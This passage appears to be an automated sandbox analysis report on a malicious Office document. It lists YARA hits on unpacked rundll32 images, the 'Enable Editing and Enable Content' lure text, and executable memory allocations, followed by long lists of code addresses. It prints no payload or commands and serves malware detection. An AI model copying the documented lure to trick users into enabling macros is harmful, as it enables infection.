                      Source: Yara matchFile source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing and Enable Content. 0 Page: I of I , words: 8,746 , ,3 , N@m 13 ;a 10096 G)
                      Source: Screenshot number: 4Screenshot OCR: Enable Content. 0 Page: I of I , words: 8,746 , ,3 , N@m 13 ;a 10096 G) FI G) ,, . i m.j
                      Source: Screenshot number: 8Screenshot OCR: Enable Editing and Enable Content. a nmmm O I @ 100% G) A GE)
                      Source: Screenshot number: 8Screenshot OCR: Enable Content. a nmmm O I @ 100% G) A GE)
                      Source: Document image extraction number: 0Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 0Screenshot OCR: Enable Content.
                      Source: Document image extraction number: 1Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 1Screenshot OCR: Enable Content.
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5669
                      Source: unknownProcess created: Commandline size = 5568
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5568Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Itwxrtu\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200A0F17_2_0200A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF64177_2_01FF6417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF7FFE7_2_01FF7FFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF35FC7_2_01FF35FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02002C057_2_02002C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF67EF7_2_01FF67EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFF5E07_2_01FFF5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF2DDF7_2_01FF2DDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020002237_2_02000223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF57D47_2_01FF57D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02008C2B7_2_02008C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200D02D7_2_0200D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020026317_2_02002631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02008A337_2_02008A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02004C377_2_02004C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFF9BA7_2_01FFF9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFFFBA7_2_01FFFFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF3FAF7_2_01FF3FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFADAF7_2_01FFADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020052507_2_02005250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFBB967_2_01FFBB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF4D907_2_01FF4D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020006727_2_02000672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200AA7B7_2_0200AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF5B7D7_2_01FF5B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF73787_2_01FF7378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF3B747_2_01FF3B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020010907_2_02001090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFF3697_2_01FFF369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFC3647_2_01FFC364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02004A9E7_2_02004A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFC1457_2_01FFC145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF7B397_2_01FF7B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF39387_2_01FF3938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF33367_2_01FF3336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF77317_2_01FF7731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF9D2F7_2_01FF9D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200C6D97_2_0200C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFA5257_2_01FFA525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200D4E17_2_0200D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF91067_2_01FF9106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF5F047_2_01FF5F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFECFE7_2_01FFECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02004F047_2_02004F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200D70B7_2_0200D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFD6F07_2_01FFD6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFD2DD7_2_01FFD2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFA2D27_2_01FFA2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200CF317_2_0200CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFA6C97_2_01FFA6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02009B4A7_2_02009B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200434E7_2_0200434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02003F4F7_2_02003F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200135B7_2_0200135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFCAA37_2_01FFCAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200B1657_2_0200B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200A9667_2_0200A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFDE817_2_01FFDE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF327F7_2_01FF327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020071877_2_02007187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02001F887_2_02001F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02000B8A7_2_02000B8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFBE747_2_01FFBE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020035907_2_02003590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200C1927_2_0200C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02002FA17_2_02002FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020093AA7_2_020093AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020047B57_2_020047B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020009B87_2_020009B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF48447_2_01FF4844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFE0447_2_01FFE044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02007BBE7_2_02007BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02009DBF7_2_02009DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200DBC47_2_0200DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFA8217_2_01FFA821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02006BE47_2_02006BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200CBE77_2_0200CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF54187_2_01FF5418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FFE6127_2_01FFE612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF240F7_2_01FF240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0200BBF17_2_0200BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF22087_2_01FF2208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF18067_2_01FF1806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02001DFE7_2_02001DFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239C3D7_2_00239C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002406047_2_00240604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023C0177_2_0023C017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002440127_2_00244012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002496657_2_00249665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023E2727_2_0023E272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002354787_2_00235478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024CC7F7_2_0024CC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002444787_2_00244478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002398467_2_00239846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024BC4D7_2_0024BC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024CA557_2_0024CA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023C8517_2_0023C851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002392A37_2_002392A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C4A57_2_0024C4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00236CA57_2_00236CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002328AA7_2_002328AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002370AD7_2_002370AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232EAC7_2_00232EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B6B97_2_0023B6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002490BE7_2_002490BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002434BF7_2_002434BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239A997_2_00239A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002330E87_2_002330E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002368EC7_2_002368EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002350F17_2_002350F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002414FC7_2_002414FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002400FE7_2_002400FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002466FB7_2_002466FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002438C27_2_002438C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002434C37_2_002434C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002408CF7_2_002408CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B8D87_2_0023B8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024A6D97_2_0024A6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00249EDA7_2_00249EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023E8DD7_2_0023E8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002335237_2_00233523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023A3237_2_0023A323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023EF2E7_2_0023EF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F52E7_2_0023F52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00243D297_2_00243D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023FF2C7_2_0023FF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002471327_2_00247132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002493337_2_00249333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024D1387_2_0024D138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024B7067_2_0024B706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002343047_2_00234304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B10A7_2_0023B10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002425157_2_00242515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024891E7_2_0024891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235D637_2_00235D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024B1657_2_0024B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232B707_2_00232B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002413727_2_00241372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230D7A7_2_00230D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002421797_2_00242179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023177C7_2_0023177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00234D487_2_00234D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002323537_2_00232353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023EB547_2_0023EB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002461587_2_00246158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C15B7_2_0024C15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241BA57_2_00241BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00247FA77_2_00247FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C5A17_2_0024C5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002441AB7_2_002441AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233DB87_2_00233DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023D5B87_2_0023D5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002319837_2_00231983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023DB867_2_0023DB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023598B7_2_0023598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023498C7_2_0023498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F7937_2_0023F793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F7977_2_0023F797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239D957_2_00239D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024819F7_2_0024819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023FBE67_2_0023FBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B3E87_2_0023B3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002327F37_2_002327F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023D3F57_2_0023D3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0202303C7_2_0202303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020187D07_2_020187D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02031E147_2_02031E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020052508_2_02005250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF4D908_2_01FF4D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200A0F18_2_0200A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF5F048_2_01FF5F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFD2DD8_2_01FFD2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFCAA38_2_01FFCAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02000B8A8_2_02000B8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020047B58_2_020047B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF48448_2_01FF4844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFA8218_2_01FFA821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200CBE78_2_0200CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF64178_2_01FF6417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF7FFE8_2_01FF7FFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF35FC8_2_01FF35FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02002C058_2_02002C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF67EF8_2_01FF67EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFF5E08_2_01FFF5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF2DDF8_2_01FF2DDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020002238_2_02000223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF57D48_2_01FF57D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02008C2B8_2_02008C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200D02D8_2_0200D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020026318_2_02002631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02008A338_2_02008A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02004C378_2_02004C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFF9BA8_2_01FFF9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFFFBA8_2_01FFFFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF3FAF8_2_01FF3FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFADAF8_2_01FFADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFBB968_2_01FFBB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020006728_2_02000672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200AA7B8_2_0200AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF5B7D8_2_01FF5B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF73788_2_01FF7378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF3B748_2_01FF3B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020010908_2_02001090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFF3698_2_01FFF369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFC3648_2_01FFC364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02004A9E8_2_02004A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFC1458_2_01FFC145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF7B398_2_01FF7B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF39388_2_01FF3938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF33368_2_01FF3336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF77318_2_01FF7731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF9D2F8_2_01FF9D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200C6D98_2_0200C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFA5258_2_01FFA525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200D4E18_2_0200D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF91068_2_01FF9106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFECFE8_2_01FFECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02004F048_2_02004F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200D70B8_2_0200D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFD6F08_2_01FFD6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFA2D28_2_01FFA2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200CF318_2_0200CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFA6C98_2_01FFA6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02009B4A8_2_02009B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200434E8_2_0200434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02003F4F8_2_02003F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200135B8_2_0200135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200B1658_2_0200B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200A9668_2_0200A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFDE818_2_01FFDE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF327F8_2_01FF327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020071878_2_02007187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02001F888_2_02001F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFBE748_2_01FFBE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020035908_2_02003590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200C1928_2_0200C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02002FA18_2_02002FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020093AA8_2_020093AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020009B88_2_020009B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFE0448_2_01FFE044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02007BBE8_2_02007BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02009DBF8_2_02009DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200DBC48_2_0200DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02006BE48_2_02006BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF54188_2_01FF5418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFE6128_2_01FFE612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF240F8_2_01FF240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200BBF18_2_0200BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF22088_2_01FF2208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF18068_2_01FF1806
